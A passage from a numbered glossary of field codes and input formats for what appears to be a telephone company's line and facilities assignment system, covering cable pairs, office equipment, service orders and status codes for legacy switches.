  1408. AO   Allocation Order
  1409.      AO XX
  1410.      XX=Two Numeric Characters
  1411. AR   Advance Relay
  1412.      AR XYY-ZZZ
  1413.      X=Marker Group
  1414.      YY=Number Group from Frame
  1415.      ZZZ=Relay Number
  1416. ATN  Assigner's Telephone Number
  1417.      ATN XXX-XXXX
  1418.      XXX-XXXX=Assigners TN
  1419. BL   Bridge Lifter
  1420.      BL XX...XX
  1421.      XX...XX=Maximum of 17 Alphanumeric Characters
  1422. BLS  Bridge Lifter Status
  1423.      BLS X
  1424.      Y=Yes
  1425.      N=No
  1426. BND  Band Number
  1427.      BND X
  1428.      X=0-3
  1429. BTN  Billing Telephone Number
  1430.      BTN XXX-XXXX
  1431.      XXX-XXXX=Billing Telephone Number
  1432. CA   Cable Number
  1433.      CA XX...XX
  1434.      XX...XX=Maximum of 10 Alphanumeric Characters
  1435. CAT  Centrex Access Treatment
  1436.      CAT XX
  1437.      XX=Maximum of 2 Numeric Characters
  1438. CC   Call Count
  1439.      CC XX
  1440.      XX=Maximum of 2 Numeric Characters
  1441. CCF  Custom Calling Features
  1442.      CCF XXXXXX
  1443.      XXXXXX=3 to 6 Alphanumeric Characters
  1444. CCS  Hundred Call Seconds
  1445.      CCS XXXX
  1446.      XXXX=3 or 4 Numeric Characters
  1447. CEU  CCS Estimated Usage
  1448.      CEU XXXX
  1449.      XXXX=3 or 4 Numeric Characters
  1450. CG   Control Group Number
  1451.      CG X
  1452.      X=0-9
  1453. CKID Circuit Identification
  1454.      CKID XX...XX
  1455.      XX..XX=Maximum of 61 Alphanumeric Characters
  1456. CKL  Circuit Location
  1457.      CKL XXXX
  1458.      XXXX=Maximum of 4 Alphanumeric Characters
  1459. CLC  Common Language Code for an Entity
  1460.      CLC XX...XX
  1461.      XX...XX=Maximum of 11 Alphanumeric Characters
  1462. CLCI Common Language Circuit Identification
  1463.      CLCI XX...XX
  1464.      XX...XX=Maximum of 61 Alphanumeric Characters
  1465. CLEI Common Language Equipment Identifier
  1466.      CLEI XX...XX
  1467.      XX...XX=Maximum of 10 Alphanumeric Characters
  1468. CLF  Creating DIPs Upper Bound Load Factor
  1469.      CLF XX
  1470.      XX=1-10
  1471. CLL  Creating DIPs Lower Bound Load Factor
  1472.      CLF X
  1473.      X=1-9
  1474. CLS  CLCI in Serial Number Format
  1475.      CLS XX...XX
  1476.      XX..XX=Maximum of 61 Alphanumeric Characters
  1477. CLT  CLCI Telephone Number Format
  1478.      CLT XX...XX
  1479.      XX...XX=Maximum of 61 Alphanumeric Characters
  1480. CMF  Capacity Main Station Fill
  1481.      CMF XXXXXX
  1482.      XXXXXX=Maximum of 6 Numeric Characters
  1483. CMU  CCS Measured Usage
  1484.      CMU XXXX
  1485.      XXXX=3 or 4 Numeric Characters
  1486. COM  Complement Size
  1487.      COM XXXX
  1488.      XXXX=1-9999
  1489. CON  Concentrator
  1490.      CON XX-YY
  1491.      XX=Maximum of 2 Alphanumeric Characters
  1492.      YY=Maximum of 2 Numeric Characters
  1493. CP   Cable and Pair Number
  1494.      CP XX...XX-YZZZ
  1495.      XX...XX=Cable ID, Maximum of 10 Alphanumeric Characters
  1496.      YZZZ=Cable Pair ID
  1497.      Y=Alphanumeric
  1498.      ZZZ=Numeric
  1499. CPU  CCS Capacity Usage
  1500.      CPU XXXX
  1501.      XXXX=3 or 4 Numeric Characters
  1502. CRG  CREG Tag
  1503.      CRG XXX
  1504.      XXX=YES or NO
  1505. CS   Customer Class of Service
  1506.      CS XXXXXX
  1507.      XXXXXX=Maximum of 6 Alphanumeric Characters
  1508. CTID Circuit Termination Identification
  1509.      CTID XX...XX
  1510.      XX...XX=Maximum of 61 Alphanumeric Characters
  1511. CTT  Cut Through Tag
  1512.      CTT XXX
  1513.      XXX=YES or NO
  1514. CTX  Centrex Group Number
  1515.      CTX XXXX
  1516.      XXXX=Maximum of 4 numeric Characters
  1517. DC   Dial Code
  1518.      DC X
  1519.      X=1 Alpha Characters
  1520. DD   Due Date
  1521.      DD MM-DD-YY
  1522.      MM=Month
  1523.      DD=Day
  1524.      YY=Year
  1525. DID  Direct Inward Dialing
  1526.      DID XXXX
  1527.      XXXX=Maximum of 4 Numeric Characters
  1528. DIP  DIP Creation Option
  1529.      DIP X
  1530.      Y=Yes
  1531.      N=No
  1532. DNY  Denial of Service for Non-payments
  1533.      DNY X
  1534.      I=Incoming
  1535.      O=Outgoing
  1536.      B=Both
  1537. DPA  Different Premises Address
  1538.      DPA XXX
  1539.      XXX=Maximum of 3 Alphanumeric Characters
  1540. DPT  Department Name
  1541.      DPT XXX
  1542.      XXX=Maximum of 3 Alphanumeric Characters
  1543. DST  Destination of Order Response
  1544.      DST XXXX
  1545.      XXXX=Maximum of 4 Alphanumeric Characters
  1546. DT   Due Time
  1547.      DT XX
  1548.      XX=AM, PM, or 0-9
  1549. EC   ESS Entity and Control Group Number
  1550.      EC YZ
  1551.      Y=Entity Number
  1552.      Z=Control Group Identifier
  1553. ECS  Equipment Class of Service
  1554.      ECS XXXXXX
  1555.      XXXXXX=Maximum of 6 Alphanumeric Characters
  1556. ED   Enter Date
  1557.      ED MM-DD-YY
  1558.      MM=Month
  1559.      DD=Day
  1560.      YY=Year
  1561. EN   Entity
  1562.      EN X
  1563.      X=S, E, 1, 5 or 0
  1564. EN   Entity Number
  1565.      EN X
  1566.      X=0-9
  1567. ENT  Entity Number
  1568.      ENT X
  1569.      X=0-9
  1570. EO   Error Handling Option
  1571.      EO XX
  1572.      CE=Continue Processing and Establish Valid Circuits
  1573.      CW=Continue Processing and Withdraw Established Circuits
  1574.      SE=Stop Processing and Establish Valid Circuits
  1575.      SW=Stop Processing and Withdraw Established Circuits
  1576. EQF  Equipment Features
  1577.      EQF WXYZ
  1578.      W=R (Rotary) or T (Touchtone)
  1579.      Y=S (Sleeve) X (Range Extension) or N (Non-sleeve or Non-range Extension)
  1580.      X=E (Essential) or N (Non-essential)
  1581.      Z=G (Ground Start) or L (Loop Start)
  1582. EQV  Frame Equivalence
  1583.      EQV FXX
  1584.      F=The Letter "F"
  1585.      XX=Two Alphanumeric Characters
  1586. ETC  Estimated Trunk CCS Value
  1587.      ETC XXXX
  1588.      XXXX=Maximum of 4 Alphanumeric Characters
  1589. EXD  ECS Crossloading Option
  1590.      EXD XXX
  1591.      XXX=YES or NO
  1592. FAC  Type of Segment List Being Audited
  1593.      FAC XX
  1594.      TN=Telephone Number
  1595.      OE=Line Equipment
  1596. FAC  Circuit Confiruration
  1597.      FAC XXX          or
  1598.      FAC TN-NNX       or
  1599.      FAC CP-XX...X    or
  1600.      FAC SE-YY...Y    or
  1601.      FAC PL-ZZ...Z
  1602.      XXX=Any Facility Prefix
  1603.      NNX=Three Alphanumeric Characters
  1604.      XX...XX=Maximum of 10 Alphanumeric Characters
  1605.      YY...YY=Maximum of 52 Alphanumeric Characters
  1606.      ZZ...ZZ=Maximum of 61 Alphanumeric Characters
  1607. FC   From Cable
  1608.      FC XX...XX
  1609.      XX...XX=Maximum of 10 Alphanumeric Characters
  1610. FDD  Frame Due Date
  1611.      FDD MM-DD-YY
  1612.      MM=Month
  1613.      DD=Day
  1614.      YY=Year
  1615. FEA  Customer Feature
  1616.      FEA XXXX
  1617.      (Same as EQF)
  1618. FILT Filter
  1619.      FILT XXX
  1620.      XXX=Y, YES, N, or NO
  1621. FR   Frame Identification
  1622.      FR FXX
  1623.      F=The letter "F"
  1624.      XX=Two Alphanumeric Characters
  1625. FT   Frame Time
  1626.      FT XX
  1627.      XX=01-24
  1628. FW   MDF Output Suppressed
  1629.      FW X
  1630.      Y=Frame Work Yes
  1631.      N=Frame Work No
  1632. GP   MLHG Group Number
  1633.      GP Y-XXXX
  1634.      Y=Alphanumeric Control Group
  1635.      XXXX=Numeric Group Number
  1636. GSO  Ground Start Option
  1637.      GSO X
  1638.      1=Assigned to any OE in the Entity
  1639.      2=Assigned to Even Levels
  1640.      3=Only Assigned to OE Specified as Ground Start
  1641. HC   Hunt Count
  1642.      HC XXXX
  1643.      XXXX=Maximum of 4 Numeric Characters
  1644. HF   Hunt-from Telephone Number
  1645.      HF XXX-XXXX
  1646.      XXX-XXXX=Telephone Number
  1647. HLC  Highest Lead Factor Group Count
  1648.      HLC XXXX
  1649.      XXXX=1-9999
  1650. HR   Held Order Reason Code
  1651.      HR XX
  1652.      CE=Equipment Shortage
  1653.      CF=Lack of Facility
  1654.      CL=Plant Load
  1655.      CO=General Company Reasons
  1656.      C1-C5-Additional Company Reasons
  1657.      SA=Subscriber Access
  1658.      SL=Subscriber Requested Later Date
  1659.      SO=General Subscriber Reasons
  1660.      SR=Subscriber Not Ready
  1661.      S1-S5=Additional General Subscriber Reasons
  1662. HRS  Hours Prefix
  1663.      HRS XX
  1664.      XX=01-24
  1665. HT   Hunt-to Telephone Number
  1666.      HT XXX-XXXX
  1667.      XXX-XXXX=Telephone Number
  1668. HTG  Hunt-to Group Number
  1669.      HTG Y-XXXX
  1670.      Y=Alphanumeric Control Group
  1671.      XXXX=Numeric Group Number
  1672. HTX  Hunt-to X Number
  1673.      HTX XXX-YYXX of
  1674.      HTX XXX-YXX
  1675.      Y=Alphanumeric
  1676.      X=Numeric
  1677. INIT Allocation Table Initalization
  1678.      INIT
  1679.      (No Data Entry)
  1680. ITM  Cable Pair Item Number
  1681.      ITM XX
  1682.      XX=Two Numeric Characters
  1683. JL   Jumper Length
  1684.      JL XXX
  1685.      XXX=Maximum of 3 Numeric Characters
  1686. JR   Jeopardy Reason
  1687.      JR XX
  1688.      A1=Assignment Error on CP
  1689.      A2=Assignment Error on OE
  1690.      A3=Assignment Error on TN
  1691.      A4-A9=Other Assignment Error
  1692.      C1=No SSWO for Circuit Design Group
  1693.      C2-C9=Local Code for Circuit Design Group
  1694.      E1-E9=No ESS Translations
  1695.      IB=No Installation Go-ahead for Business
  1696.      IC=No Installation Go-ahead for Coin
  1697.      ID=No Installation Go-ahead for Data
  1698.      IR=No Installation Go-ahead for Residence
  1699.      IS-No Installation Go-ahead for Special
  1700.      I1-I4=Local Codes foir No Installation Go-ahead
  1701.      RB=Business RSB
  1702.      RC=Coin RSB
  1703.      RD=Data RSB
  1704.      RR=Residence RSB
  1705.      RS=Special RSB
  1706.      R1-R4=Local Use for RSB
  1707. LC   Output Line Count
  1708.      LC XXXX
  1709.      XXXX=0-9999
  1710. LC   Line Count
  1711.      LC XXX
  1712.      XXX=0-999
  1713. LC   Pending Service Order Count
  1714.      LC
  1715.      (No Data Entry)
  1716. LCC  Line Class Code
  1717.      LCC XXX
  1718.      XXX Maximum of 3 Alphanumeric Characters
  1719. LD   Loading Division
  1720.      LD XX
  1721.      XX=Two Numeric Characters
  1722. LDN  Listed Directory Number
  1723.      LDN XXX-XXXX
  1724.      XXX-XXXX=Telephone Number
  1725. LF   Load Factor
  1726.      LF XX
  1727.      XX=1-10
  1728. LIM  Less Than the Specified Number of Pairs
  1729.      LIM XX
  1730.      XX=0-50
  1731. LIM  High Limit on Number of Specified Status Pairs in a Complement
  1732.      LIM XX
  1733.      XX=0-50
  1734. LIM  Low Limit on Number of Spare Line Equipment in Vertical Files
  1735.      LIM XX
  1736.      LIM=1-10
  1737. LLC  Low Load Group Count
  1738.      LLC XXXX
  1739.      XXXX=0-9999
  1740. LOC  Location
  1741.      LOC FXXYYY
  1742.      F=The Letter "F"
  1743.      XX=Alphanumeric
  1744.      YYY=001-999
  1745. LP   Loop Range
  1746.      LP XXX;XXX
  1747.      XXX;XXX=Six Numeric Characters
  1748. LS   List New Pending Cable Transfers
  1749.      LS XXX
  1750.      XXX=NEW
  1751. LTI  Loop Termination Identifier
  1752.      LTI XXX
  1753.      XXX=Three Alphanumeric Characters
  1754. MASK Office Equipment Mask
  1755.      MASK OE ID
  1756.      ID=XXX-XXX-XXX    =1ESS
  1757.      ID=XXX-XXXX       =2ESS
  1758.      ID=XXX-XXXX       =3ESS
  1759.      ID=XXXX-XXX-XX    =5ESS
  1760.      ID=XXXX-XX-XX     =5ESS
  1761.      ID=XXXX-X-XXXX    =RSS
  1762.      ID=XXXX-XXX-XX    =1XB
  1763.      ID=XXXX-XXXX-XX   =1XB
  1764.      ID=XXX-XX-XX      =5XB
  1765.      ID=XXXX-XXX       =SXS
  1766.      ID=XXX-X-XX-X     =DMS-10
  1767.      ID=XXX-X-XX-XX    -DMS-100
  1768.      X=Alphanumeric
  1769. MAT  Manual Assistance Tag
  1770.      MAT XXX
  1771.      XXX=YES or NO
  1772. MAX  Maximum Percentage Value of Entity Fill or Maximum CCS Value
  1773.      MAX XXX
  1774.      XXX=Maximum of 3 Numeric Characters
  1775. MBL  Mini-bridge Lifter Tag
  1776.      MBL XX
  1777.      Y=MBL Working on CP
  1778.      N=CP Can't Support MBL
  1779.      EQ=CP has MBL Capabilities
  1780. MC   Marker Class of Service
  1781.      MC XX
  1782.      XX=Two Alphanumeric Characters
  1783. MF   Recent Change Message Format
  1784.      MF XXXX
  1785.      NEW=RX:LINE:messages
  1786.      OUT=RC:LINE:OUT:messages
  1787.      CHG=RC:LINE:CHG:messages
  1788.      SUSP=RC:LINE:CHG:messages of suspended service
  1789. MF   Jumper Listing for MDF
  1790.      MF XXX
  1791.      NEW=Running Jumper Listing
  1792.      DJ=Dead Jumper Listing
  1793. MF   Message Format When Completing Transfer Circuits with TOC
  1794.      MF XXX
  1795.      ALL=Message is Printed for Every Circuit in Range
  1796.      ERR=Message Printed Only for Circuits not Completed
  1797. MF   Message Format for Dial Transfer Number Lists
  1798.      MF XXX
  1799.      GVR=Transaction GFR Output Format, One Facility per Line
  1800.      LVT=Line Verification Test Format
  1801.      TLC=Two-line Condensed Format
  1802. MG   Marker Group Number
  1803.      MG X
  1804.      X=0-9
  1805. MIN  Minimum Percentage Value of Entity Fill or Minimum CCS Value
  1806.      MIN XXX
  1807.      XXX=Maximum of 3 Numeric Characters
  1808. MLP  Multi-loop Resistance Zone Threshold
  1809.      MLP XX
  1810.      XX=Two Numeric Characters
  1811. MOD  Module Number
  1812.      MOD XXX
  1813.      XXX=Three Numeric Characters
  1814. MODE Integrated SLC No. 5ESS Mode
  1815.      MODE X
  1816.      1=5 T1 Carrier Channels
  1817.      2=3 T1 Carrier Channels
  1818. MPN  Master Work Package Number
  1819.      MPN XXXX
  1820.      XXXX=1-9999
  1821. MR   Message Register
  1822.      MR XXXXXX
  1823.      XXXXXX=Maximum of 6 Alphanumeric Characters
  1824. MRO  Message Register Option
  1825.      MRO XXX
  1826.      XXX=YES or NO
  1827. MT   Master Record Tape Unit Number or Tape Drive to Write
  1828.      MT X
  1829.      X=Numeric
  1830. MTR  Tape Drive to Read
  1831.      MTR X
  1832.      X=Numeric
  1833. MTW  Tape Drive to Write
  1834.      MTW X
  1835.      X=Numeric
  1836. NAR  NAC Assignment Review
  1837.      NAR XXX
  1838.      XXX=Maximum of 3 Numeric Characters
  1839. NGF  Number Group Frame for 5XB
  1840.      NGF XXX
  1841.      XXX=Three Numeric Characters
  1842. NNX  Telephone Exchange Code
  1843.      NNX XXX
  1844.      XXX=THree Numeric Characters
  1845. NOE  Number of OEs to be Assigned
  1846.      NOE X
  1847.      X=0 or 1
  1848. NPA  Area Code and Exchange Number
  1849.      NPA XXXXXX
  1850.      XXXXXX=Six Alphanumeric Characters
  1851. NRM  Normalizing CCS VAlue
  1852.      NRM XX
  1853.      XX=0-99
  1854. NTN  Number of TNs to be Assigned
  1855.      NTN X
  1856.      X=0 or 1
  1857. OA   Line Equipment Assignment Option
  1858.      OA X
  1859.      Y=Yes
  1860.      N=No
  1861. OC   Order Category
  1862.      OC XXX
  1863.      ACT=Assignment Change Ticket
  1864.      ALL=All OE Load Factors
  1865.      CPC=Special Service
  1866.      FM=Count Since OE Input Features Occurrences
  1867.      FO=Count All OE Input Feature Occurrences
  1868.      HOT=Frame Ouput-urgent
  1869.      JR=Jeopardy Reason
  1870. OCS  Old Class of Service
  1871.      OCS XXXXXX
  1872.      XXXXXX=Maximum of 6 Alphanumeric Characters
  1873. OD   Output Device
  1874.      OD XXXX
  1875.      TT=Send Output to Current Terminal
  1876.      TTXX=Send Output to Specified Terminal XX
  1877.      MTX=Send Output to Magnetic Tape X
  1878. OE   Office Equpiment Number
  1879.      OE ID
  1880.      (See MASK)
  1881. OGO  Outgoing Only Trunk
  1882.      OGO XXX
  1883.      XXX=Maximum of 4 Numeric Characters
  1884. OPT  Party Assignment Option
  1885.      OPT X
  1886.      1=Assign Multi-party Customers to Spare Party Equipment
  1887.      2=Assign Multi-party Customer to Partially Equipped Party Equipment
  1888.      3=Assign Only One Multi-Party Customer to each Single Party Equipment
  1889. ORD  Service or Work Order
  1890.      ORD XX...XX
  1891.      XX...XX=Maximum of 20 Alphanumeric Characters
  1892. OT   Service or Work Order Type
  1893.      OT XXX
  1894.      BT=Background Transfer
  1895.      CD=Complete Disconnect
  1896.      CH=Changed
  1897.      CIO=Company Initiated Orders
  1898.      F="FROM"
  1899.      LET=Line Equipment Transfers
  1900.      LST=Line and Station Transfers
  1901.      MCE=Maintenance Change by LAC
  1902.      MCR=Maintenance Change by Repair
  1903.      MCT=All Maintenance Changes
  1904.      NC=New Connect
  1905.      R=Remarks
  1906.      REA=Pending Reassociation
  1907.      SW=Swap
  1908.      T="TO"
  1909. PBX  Private Branch Exchange
  1910.      PBX XXXX
  1911.      XXXX=Maximum of 4 Numeric Characters
  1912. PCID Primary Circuit Identification
  1913.      PCID XX...XX
  1914.      XX...XX=Maximum of 61 Alphanumeric Characters
  1915. PKT  Picket Fence Values
  1916.      PKT XXX.X,...,XXX.X
  1917.      XXX.X,...,XXX.X=Nine sets of Four Numeric Characters or
  1918.      N=No New Values
  1919. PL   Private line Circuit Number
  1920.      PL XX...XX
  1921.      XX...XX=Maximum of 61 Alphanumeric Characters
  1922. PNL  PREMIS Number List for TN
  1923.      PNL XX...XX
  1924.      XX...XX=Maximum of 12 Alphanumeric Characters
  1925. POP  Line Equipment Print Option
  1926.      POP XXX
  1927.      CNC=Concentrator-1ESS, 2ESS, 3ESS, RSS
  1928.      CNG=Concentrator Group-2ESS, 3ESS
  1929.      HG=Horizontal Group-5XBAR
  1930.      IM=Interface Module-5ESS
  1931.      LFG=Line Finder Group-SXS
  1932.      LLF=Line Link Frame-5XBAR
  1933.      LLN=Line Link Net-1ESS
  1934.      LTN=Line Trunk Net-2ESS
  1935.      LU=Link Unit Module-5ESS
  1936.      QC=Quarter Choice-1XBAR
  1937.      SW=Switch-1XBAR
  1938.      VF=Vertical FIle-5XBAR
  1939. PR   Cable Pair ID
  1940.      PR YXXX
  1941.      Y=Alphanumeric
  1942.      XXX=Numeric
  1943. PRI  Frame Priority
  1944.      PRI XX
  1945.      XX=Two Numeric Characters
  1946. PRP  Permanent Cable Pair Remarks
  1947.      PRP XX...XX
  1948.      XX...XX=Maximum of 14 Alphanumeric Characters
  1949. PRZ  Preferred Rate Zone
  1950.      PRT X
  1951.      X=Numeric
  1952. PS   Previously Published/Non-published Facility Indicator
  1953.      PS X
  1954.      N=Non-Published
  1955.      !=Published
  1956. PT   Package Time
  1957.      PT XXX
  1958.      XXX=Three Numeric Characters
  1959. PTY  Party Number or Position
  1960.      PTY X
  1961.      X=1-4
  1962. PTY  Party Indicator
  1963.      PTY X
  1964.      R=Reserved
  1965.      O=Open
  1966. PWC  PREMIS Wire Center
  1967.      PWC XX...XX
  1968.      XX...XX=Maximum of 8 Alphanumeric Characters
  1969. PWC  Print Work Code
  1970.      PWC XXX
  1971.      NBT=No Back Tap
  1972.      COM=Frame Complete
  1973.      PBT=Print Back Tap
  1974.      RCT=Place Heat Coils on "TO" Pair
  1975.      RBT=Remove Back Tap
  1976.      RCF=Remove Heat Coils on "FROM" Pair
  1977.      VBT=Verify Back Tap
  1978.      USX=Locally Defined Codes (X=1-4)
  1979. RAP  Rotary Assignment Priority
  1980.      RAP X
  1981.      X=Numeric
  1982. RCT  Recent Change Type
  1983.      RCT XX
  1984.      1=1ESS Office
  1985.      1A=1AESS Office
  1986.      2=2ESS (LO1)
  1987.      2E=2ESS (EF1 and EF2)
  1988.      3=3ESS
  1989.      5T=5ESS
  1990. RCW  Recent Change Keyword
  1991.      RCW XX...XX
  1992.      XX...XX=Maximum of 20 Alphanumeric Characters
  1993. RD   Release Date
  1994.      RD MM-DD-YY
  1995.      MM=Month
  1996.      DD=Day
  1997.      YY=Year
  1998. RDG  Message Register Reading
  1999.      RDG XXXX
  2000.      XXXX=Four Numeric Characters
  2001. REC  Record File Name and Number
  2002.      REC FFXXXXXX
  2003.      FF=File Name (Alphanumeric)
  2004.      XXXXXX=Record Number (Maximum of 6 Numeric Characters)
  2005. REP  Reprint Option
  2006.      REP X
  2007.      Y=Yes
  2008.      N=No
  2009. RESP Send a Solicited Response
  2010.      RESP X
  2011.      S=Solicited Response
  2012. REW  Rework Status
  2013.      REW X
  2014.      Y=Yes
  2015.      N=No
  2016. RLF  Re-using DIPs Upper Bound Load Factor
  2017.      RLF X
  2018.      X=1-9
  2019. RLO  Automatic Relay Assignment Present
  2020.      RLO X
  2021.      Y=Yes
  2022.      N=No
  2023. RLY  Miscellaneous Relay
  2024.      RLY XX...XX
  2025.      XX...XX=Maximum of 10 Alphanumeric Characters
  2026. RMK  Remarks on Orders
  2027.      RMK XX...XX
  2028.      XX...XX=Maximum of 28 Alphanumeric Characters
  2029. RMKG Hunt Group Remarks
  2030.      RMKG XX...XX
  2031.      XX...XX=Maximum of 30 Alphanumeric Characters
  2032. RMKO Remarks on Office Equipment
  2033.      RMKO XX...XX
  2034.      XX...XX=Maximum of 12 Alphanumeric Characters
  2035. RMKP Remarks on Cable Pair
  2036.      RMKP XX...XX
  2037.      XX...XX=Maximum of 14 Alphanumeric Characters
  2038. RMKT Remarks on Telephone Number
  2039.      RMKT XX...XX
  2040.      XX...XX=Maximum of 14 Alphanumeric Characters
  2041. RNO  RSS Subentity Number
  2042.      RNO XX
  2043.      XX=01-63
  2044. RTI  Route Index
  2045.      RTI XXXX
  2046.      XXXX=Maximum of 4 Numeric Characters
  2047. RTYP Relay Type
  2048.      RTYP XXX
  2049.      TBA=Tens Block Auxiliary
  2050.      SC=Sleeve Connect
  2051.      AR=Advance
  2052. RTZ  Rate Zone
  2053.      RTZ X
  2054.      X=Numeric
  2055. RW   Recent Change Work
  2056.      RW X
  2057.      N=Recent Change Message not Required
  2058.      C=Recent Change Coordination Required
  2059. RZ   Resistance Zone
  2060.      RZ XX
  2061.      XX=Two Numeric Characters
  2062. SBS  Sub-status
  2063.      SBS X
  2064.      A=Area Transfer
  2065.      C=Cut Through
  2066.      D=Dedicated
  2067.      L=Cut Through and Dedicated
  2068.      !=Blank
  2069. SC   Sleeve Connect Relay
  2070.      SC SYY-ZZZ
  2071.      S=Marker Group (Numeric)
  2072.      YY=Number Group Frame (Numeric)
  2073.      ZZZ=Relay Number (Numeric)
  2074. SE   Special Service Equipment Number
  2075.      SE XX...XX
  2076.      XX...XX=Maximum of 52 Alphanumeric Characters
  2077. SET  Single Entity Tag
  2078.      SET X
  2079.      Y=CP is Served by a Single Entity on a Single Frame
  2080.      !=CP Can be Served by More Than One Entity
  2081. SG   Service Segment
  2082.      SG X
  2083.      B=Business
  2084.      C=Coin
  2085.      D=Data
  2086.      R=Residence
  2087.      S=Special
  2088. SGN  Common Language Segment Number
  2089.      SGN XXX
  2090.      XXX=Maximum of 3 Alphanumeric Characters
  2091. SIS  Special Identifying Telephone Number Supplement
  2092.      SIS XXXX
  2093.      XXXX=Maximum of 4 Numeric Characters
  2094. SIT  Special Identifying Telephone Number
  2095.      SIT XXX-YYY-XXXX
  2096.      X=Numeric
  2097.      Y=Numeric
  2098. SK   Skip Option
  2099.      SK X
  2100.      X=0 or 2-9
  2101. SN   Sequence Number
  2102.      SN XXX
  2103.      XXX=1-999
  2104. SOB  Service Observing Tag
  2105.      SOB XXX
  2106.      XXX=YES or NO
  2107. SS   Suspension Status
  2108.      SS XX
  2109.      DB=Deny Both Ways
  2110.      DI=Deny Incoming
  2111.      DO=Deny Outgoing
  2112.      RS=Restore Suspended Circuit
  2113.      SB=Suspend Both Ways
  2114.      SD=Season Disconnect
  2115.      SI=Suspend Incoming
  2116.      SO=Suspend Outgoing
  2117.      DX=Deny Toll Access Tervice
  2118. SSV  Suspend Service Type
  2119.      SSV XX
  2120.      DO=Deny Outward Service
  2121.      DB=Deny Both Outward and Inward Service
  2122.      DX=Deny Toll Access Service
  2123.      RS=Restore Denied Service
  2124. STAT Order Status
  2125.      STAT XX
  2126.      AC=Pending With no Framd or Installation Completion
  2127.      FC=Pending With Frame Completion but no Installation Completion
  2128.      IC=Pending with Installation Complation but no Frame Completion
  2129.      CC=Completed Orders
  2130.      CA=Canceled Orders
  2131. STAT Facility Status
  2132.      STAT XX
  2133.      AS=All Spare
  2134.      EX=Excluded
  2135.      PC=Pending Connect
  2136.      RS=Reserved
  2137.      SF=Spare Facility
  2138.      UK=Unknown
  2139.      WK=Working
  2140. STAT Load Group Status
  2141.      STAT XX
  2142.      EX=Blocked from all Assignments
  2143.      FU=Open for Dial Transfer Assignments Only
  2144.      PS=Pseudo LEN Assignments Only
  2145.      SO=Open for Service Orders and Work Orders Only
  2146.      WK=Open for All Assignments
  2147. STO  Line Equipment Status
  2148.      STO XX
  2149.      AW=All Working
  2150.      MS=Miscellaneous
  2151.      OF=Official
  2152.      TJ=Trunk and Junctor
  2153.      TS=Test
  2154.      WK=Working
  2155.      PD=Pending Disconnect
  2156.      PK Pending Disconnect/Pending New Connect
  2157.      AS=All Spare
  2158.      EX=Excluded
  2159.      LI=Left-in Disconnect
  2160.      RS=Reserved
  2161.      SF=Spare
  2162.      UK=Unknown
  2163.      PC=Pending Connect
  2164. STP  Cable and Pair Status
  2165.      STP XX
  2166.      AL=All Pairs
  2167.      AD=All Defective
  2168.      AP=All Provisioned
  2169.      AW=All Working
  2170.      DC=Designed Circuit
  2171.      DI=Defective (I=1-9)
  2172.      DM=Designed + SSM
  2173.      DP=Designed + SSP
  2174.      SM=Special Safeguard Measures
  2175.      SP=Special Safeguard Protection
  2176.      SS=Special Status
  2177.      WK=Working
  2178.      AS=All Spare
  2179.      EX=Excluded
  2180.      LI=Left-in Disconnect
  2181.      RS=Reserved
  2182.      SF=Spare
  2183.      UK=Unknown
  2184.      PC=Pending Connect
  2185.      PD=Pending Disconnect
  2186. STT  Telephone Number Status
  2187.      STT XX
  2188.      AU=Auxiliary
  2189.      AW=All Working
  2190.      MS=Miscellaneous
  2191.      NP=Non-published
  2192.      OF=Official
  2193.      TJ=Trunk and Junctor
  2194.      TS=Test
  2195.      WK=Working
  2196.      AS=All Spare
  2197.      AV=Available
  2198.      CM=Changed-Machine Intercept
  2199.      CO=Changed-Operator Intercept
  2200.      DM=Disconnected-Machine Intercept
  2201.      DO=Disconnected-Operator Intercept
  2202.      EX=Excluded
  2203.      RS=Reserved
  2204.      SF=Spare
  2205.      UK=Unknown
  2206.      PC=Pending Connect
  2207.      PD=Pending Disconnect
  2208.      PK=Pending Disconnect/Pending New Connect
  2209. SUBL Sublet Service
  2210.      SUBL XXX-XXXX
  2211.      XXX-XXXX=Telephone Number
  2212. SWC  Set Work Code
  2213.      SWC XXX
  2214.      (See Print Work Code)
  2215. SWG  Switch Group
  2216.      SWG X
  2217.      X=0-2
  2218. SYS  Machine Number
  2219.      SYS XX...XX
  2220.      XX...XX=Maximum of 12 Alphanumeric Characters
  2221. TA   Transfer Assembly
  2222.      TA X
  2223.      Y=Yes
  2224.      N=No
  2225. TAP  Touchtone Assignment Priority Number
  2226.      TAP X
  2227.      X=Numeric
  2228. TBA  TBA Relay
  2229.      TBA XYY-ZZZ
  2230.      X=Marker Group Number (Numeric)
  2231.      YY=Number Group Frame (Numeric)
  2232.      ZZZ=Relay Number (Numeric)
  2233. TBS  TBS Relay
  2234.      TBS XZ-NN
  2235.      X=Marker Group Number (0-9)
  2236.      Z=Relay Number (0-3)
  2237.      NN=Ringing Combination (01-16)
  2238. TC   TO Cable
  2239.      TX XX...XX
  2240.      XX...XX=Maximum of 10 Alphanumeric Characters
  2241. TER  Terminal
  2242.      TER XXXX
  2243.      XXXX=Maximum of 4 Numeric Characters
  2244. TER  Terminal Number
  2245.      TER Y-XXXX-ZZZZ
  2246.      Y=Control Group (Alphanumeric)
  2247.      XXXX=Group Number (Numeric)
  2248.      ZZZZ=Terminal Number (Numeric)
  2249. THG  Thousands Group
  2250.      THG X or
  2251.      THG XXXX
  2252.      X=0-9
  2253.      XXXX=0000,1000,...,9000
  2254. TK   Trunk Cable and Pair Number
  2255.      TK YYYYYY-XXXX
  2256.      YYYYYY=Cable ID (Maximum of 6 Alphanumeric Characters)
  2257.      XXXX=Cable Pair ID (Maximum of 4 Numeric Characters)
  2258. TLI  Telephone Line Identifier
  2259.      TLI XXX-YYY-XXXX
  2260.      X=Numeric
  2261.      Y=Alphanumeric
  2262. TN   Telephone Number
  2263.      TN XXX-XXXX
  2264.      XXX-XXXX=Telephone Number
  2265. TOM  Two or More Non-pending, Non-party Filtered Circuit Facilities
  2266.      TOM XX
  2267.      CP=Cable Pair
  2268.      TN=Telephone Number
  2269.      OE=Office Equipment
  2270. TP   Tie Pair
  2271.      TP YY...YY-XXXX
  2272.      YY...YY=Cable ID (Maximum of 10 Alphanumeric Characters)
  2273.      XXXX=Tie Pair ID (Maximum of 4 Numeric Characters)
  2274. TPR  Taper Code
  2275.      TPR XXXXXX
  2276.      XXXXXX=Maximum of 6 Alphanumeric Characters
  2277. TRE  Transmission Equipment
  2278.      TRE XX...XX
  2279.      XX...XX=Maximum of 17 Alphanumeric Characters
  2280. TT   Telephone Number Type
  2281.      TT X
  2282.      B=POTs Hunting
  2283.      C=Coin
